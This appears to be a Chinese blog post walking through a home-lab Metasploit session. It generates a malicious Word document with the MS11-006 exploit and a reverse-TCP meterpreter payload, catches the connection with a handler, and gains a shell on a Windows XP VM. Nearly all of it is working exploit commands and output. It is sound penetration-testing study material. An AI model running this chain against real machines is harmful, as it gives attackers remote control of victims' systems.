metasploit文件格式漏洞渗透攻击(成功获得shell)

环境BT5R1

msf > use windows/fileformat/ms11_006_createsizeddibsection
msf  exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(ms11_006_createsizeddibsection) > set LPORT 443
LPORT => 443
msf  exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/
OUTPUTPATH => /opt/framework/msf3/data/exploits/
msf  exploit(ms11_006_createsizeddibsection) > show options

Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection):

   Name        Current Setting                     Required  Description
   ----        ---------------                     --------  -----------
   FILENAME    msf.doc                             yes       The file name.
   OUTPUTPATH  /opt/framework/msf3/data/exploits/  yes       The output path to use.


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.11     yes       The listen address
   LPORT     443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(ms11_006_createsizeddibsection) > exploit

[*] Creating 'msf.doc' file ...
[*] Generated output file /opt/framework/msf3/data/exploits/msf.doc
msf  exploit(ms11_006_createsizeddibsection) > use multi/handler
msf  exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(handler) > set LPORT 443
LPORT => 443
msf  exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.11:443 
[*] Starting the payload handler...
msf  exploit(handler) > sessions -l

Active sessions
===============

No active sessions.

msf  exploit(handler) > 

把msf.doc复制到XP里,一开始,双击,BT5没反应。

后来,我用缩略图来查看,不需要双击msf.doc,BT5就有反应了(书中说是要打开该文档,估计有误)。

msf  exploit(handler) > 
[*] Sending stage (752128 bytes) to 192.168.1.143
[*] Meterpreter session 1 opened (192.168.1.11:443 -> 192.168.1.143:1099) at 2013-05-14 19:32:47 -0400

msf  exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                                      Connection
  --  ----                   -----------                                      ----------
  1   meterpreter x86/win32  ROOT-4556186478\Administrator @ ROOT-4556186478  192.168.1.11:443 -> 192.168.1.143:1099

msf  exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:44 -0400  .
40777/rwxrwxrwx   0       dir   2013-05-14 10:20:43 -0400  ..
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:13 -0400  Application Data
40777/rwxrwxrwx   0       dir   2013-05-14 10:14:40 -0400  Cookies
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Desktop
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:21 -0400  Favorites
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:22 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2013-05-14 11:30:17 -0400  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  NetHood
40777/rwxrwxrwx   0       dir   2013-05-14 17:51:30 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2013-05-14 11:30:35 -0400  Recent
40555/r-xr-xr-x   0       dir   2013-05-14 10:21:02 -0400  SendTo
40555/r-xr-xr-x   0       dir   2013-05-14 17:51:30 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2013-05-14 10:10:10 -0400  Templates
100666/rw-rw-rw-  1024    fil   2013-05-14 11:32:49 -0400  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2013-05-14 10:23:33 -0400  ntuser.ini

meterpreter > sysinfo
Computer        : ROOT-4556186478
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 1888 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>

如果换到简体中文版本的XP上面,用缩略图查看,则会失败,无法获得shell。


你可能感兴趣的:(metasploit文件格式漏洞渗透攻击(成功获得shell))